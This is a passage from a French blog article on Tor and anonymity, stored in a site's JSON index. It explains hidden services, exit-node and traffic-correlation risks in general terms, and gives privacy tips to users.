déchiffré par tous les nœuds précédents. Cela implique que seul le nœud de sortie peut lire les données et seulement si elles ont emprunté le chemin défini. Malheureusement, cela signifie aussi que le nœud de sortie peut intercepter le trafic ; nous en parlerons un peu plus tard.\nOnion routing, source: Wikipedia Tor offre également une fonctionnalité permettant de contourner le blocage de Tor. En effet, si un pays, une organisation ou quiconque décide de bloquer le réseau, il devrait bloquer les nœuds. Ce serait facile puisque les adresses sont publiques. Cependant, ils ne peuvent pas bloquer Tor grâce aux relais pont (bridge relays). Ces ponts sont des nœuds basiques, mais ils ne figurent pas dans la liste des relais ni nulle part en général. Comme il n\u0026rsquo;est pas possible de les connaître automatiquement, il devient difficile de les bloquer.\nLes services cachés # Enfin, Tor permet d\u0026rsquo;utiliser ce qu\u0026rsquo;on appelle les services cachés. Un service caché est un service accessible uniquement via le réseau Tor. Son URL se termine par \u0026ldquo;.onion\u0026rdquo; et son objectif est de rendre la localisation du service invisible.\nDisons que Bob souhaite héberger un service caché. Pour ce faire, il devra sélectionner des nœuds aléatoires sur le réseau. Ils seront appelés \u0026ldquo;points d\u0026rsquo;introduction\u0026rdquo;. Ensuite, il générera un chemin vers ceux-ci (comme dans la partie précédente). Une fois cela fait, un descripteur de service caché sera créé. Il contient la clé publique de Bob et les adresses des points d\u0026rsquo;introduction. Bob signera ce descripteur avec sa clé privée et téléversera le tout dans une base de données qui sera utilisée un peu comme un serveur DNS. Une adresse de 16 caractères se terminant par .onion sera alors générée à partir de sa clé publique.\nMaintenant, disons qu\u0026rsquo;Alice décide de se connecter au service de Bob. D\u0026rsquo;abord, elle récupérera le descripteur du service caché depuis la base de données. Puis, elle se connectera via un chemin aléatoire à un nœud aléatoire du réseau. Ce sera le point de rencontre. À ce stade, un secret à usage unique lui sera remis et elle forgera un message d\u0026rsquo;introduction (chiffré avec la clé publique du service caché) contenant l\u0026rsquo;adresse du point de rencontre et le secret à usage unique. Ce message sera envoyé à un point d\u0026rsquo;introduction. Lorsque le service caché recevra le message, il se connectera au point de rencontre et enverra son secret à usage unique. Alice sera alors notifiée que tout est en ordre et Alice et le service de Bob pourront désormais communiquer via le point de rencontre.\nDes informations plus détaillées et des schémas sont disponibles sur le site web de Tor.\nLes attaques connues # Tor est bien conçu. Cependant, ce n\u0026rsquo;est pas de la magie. Un certain nombre de choses peuvent poser problème sur le réseau, et il n\u0026rsquo;y a aucune garantie d\u0026rsquo;être absolument anonyme, même en l\u0026rsquo;utilisant.\nLe premier problème, comme je l\u0026rsquo;ai mentionné précédemment, ce sont les nœuds de sortie. Puisqu\u0026rsquo;ils sont les seuls à pouvoir voir le trafic non chiffré, ils peuvent mettre en place une attaque de type Man in the Middle et, par exemple, intercepter les paquets en transit pour obtenir des identifiants de connexion ou modifier le code de la page retournée pour y inclure du code malveillant pouvant être utilisé pour infecter l\u0026rsquo;ordinateur du client et, par exemple, trouver sa véritable localisation.\nIl existe aussi d\u0026rsquo;autres possibilités bien plus difficiles à mettre en œuvre. Elles reposent principalement sur l\u0026rsquo;analyse du trafic de multiples nœuds contrôlés par la même personne ou organisation. Plusieurs agences gouvernementales comme la NSA ou le GCHQ sont connues pour opérer des nœuds Tor. Si certaines conditions sont remplies, il est théoriquement possible d\u0026rsquo;associer le trafic du nœud de sortie aux utilisateurs. Une façon de procéder serait de contrôler les nœuds d\u0026rsquo;entrée et de sortie effectivement utilisés par quelqu\u0026rsquo;un. En analysant les données entrant dans le nœud d\u0026rsquo;entrée, il serait possible de connaître la taille des données attendues et quand elles sont censées atteindre le nœud de sortie. Ainsi, une adresse IP réelle peut être liée à ce que son propriétaire fait avec Tor. Certaines publications développent ces attaques ; en voici deux :A Practical Congestion Attack on Tor Using Long Paths, On the Effectiveness of Traffic Analysis Against Anonymity Networks Using Flow Records.\nBonnes pratiques # À partir des parties précédentes de l\u0026rsquo;article, nous pouvons maintenant déduire un certain nombre de bonnes pratiques qui devraient nous permettre d\u0026rsquo;améliorer notre anonymat avec Tor (même s\u0026rsquo;il n\u0026rsquo;y a aucune garantie d\u0026rsquo;être 100 % anonyme).\nGardez le navigateur Tor à jour. Les agences gouvernementales sont connues pour utiliser des failles de Firefox afin d\u0026rsquo;infecter les ordinateurs des utilisateurs. N\u0026rsquo;activez pas les plugins comme Flash. Par exemple, Flash est responsable d\u0026rsquo;une bonne proportion de toutes les attaques visant les utilisateurs du web. Séparez vos identités contextuelles. Si vous souhaitez rester anonyme en utilisant Tor, utiliser Facebook dessus 10 secondes plus tard n\u0026rsquo;est pas une bonne idée. Évitez d\u0026rsquo;utiliser des fichiers téléchargés via Tor. Ces fichiers peuvent contenir des ressources sur le web et vous pourriez y accéder avec votre véritable adresse IP. Ils pourraient également contenir des logiciels malveillants. Utiliser un VPN pourrait constituer une mesure de sécurité supplémentaire. Lancez Tor en utilisant une distribution orientée sécurité comme Tails. Évitez de vous connecter à des sites HTTP en utilisant Tor. N\u0026rsquo;UTILISEZ PAS Tor pour faire du pair-à-pair ou pour télécharger des choses illégalement. Il n\u0026rsquo;est pas conçu pour cela, ce n\u0026rsquo;est pas efficace et cela ne fera que ralentir les utilisateurs légitimes. Tor n\u0026rsquo;est pas magique. Ne faites pas de choses illégales dessus ; vous ne pouvez pas être sûr à 100 % d\u0026rsquo;être absolument en sécurité. ","date":"2016-06-30","externalUrl":null,"permalink":"/fr/posts/2016/tor-and-anonymity/","section":"Articles","summary":"Cet article explique comment Tor fonctionne pour offrir la confidentialité à ses utilisateurs et aux services cachés","title":"Tor et l'anonymat","type":"posts"},{"content":"","externalUrl":null,"permalink":"/fr/tags/news/","section":"Tags","summary":"","title":"Actualités","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/weekly-news/","section":"Tags","summary":"","title":"Actualités hebdomadaires","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/system-administration/","section":"Tags","summary":"","title":"Administration système","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/posts/","section":"Articles","summary":"","title":"Articles","type":"posts"},{"content":"","externalUrl":null,"permalink":"/fr/tags/today-i-learned/","section":"Tags","summary":"","title":"Aujourd'hui j'ai appris","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","externalUrl":null,"permalink":"/fr/tags/crypto-currencies/","section":"Tags","summary":"","title":"Cryptomonnaies","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/cyber-crime/","section":"Tags","summary":"","title":"Cybercriminalité","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/forensics/","section":"Tags","summary":"","title":"Forensique","type":"tags"},{"content":" ","externalUrl":null,"permalink":"/fr/authors/ixonae/","section":"Authors","summary":" ","title":"Ixonae","type":"authors"},{"content":"","externalUrl":null,"permalink":"/fr/tags/dark-markets/","section":"Tags","summary":"","title":"Marchés noirs","type":"tags"},{"content":"","externalUrl":null,"permalink":"/news/","section":"News","summary":"","title":"News","type":"news"},{"content":"","externalUrl":null,"permalink":"/fr/tags/reading-notes/","section":"Tags","summary":"","title":"Notes de lecture","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/osint/","section":"Tags","summary":"","title":"OSINT","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/programming/","section":"Tags","summary":"","title":"Programmation","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/search/","section":"Recherche","summary":"","title":"Recherche","type":"search"},{"content":"","externalUrl":null,"permalink":"/fr/tags/research/","section":"Tags","summary":"","title":"Recherche","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/networking/","section":"Tags","summary":"","title":"Réseaux","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/reverse-engineering/","section":"Tags","summary":"","title":"Rétro-ingénierie","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/security/","section":"Tags","summary":"","title":"Sécurité","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","externalUrl":null,"permalink":"/fr/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/privacy/","section":"Tags","summary":"","title":"Vie privée","type":"tags"},{"content":"","externalUrl":null,"permalink":"/fr/tags/vulnerabilities/","section":"Tags","summary":"","title":"Vulnérabilités","type":"tags"}]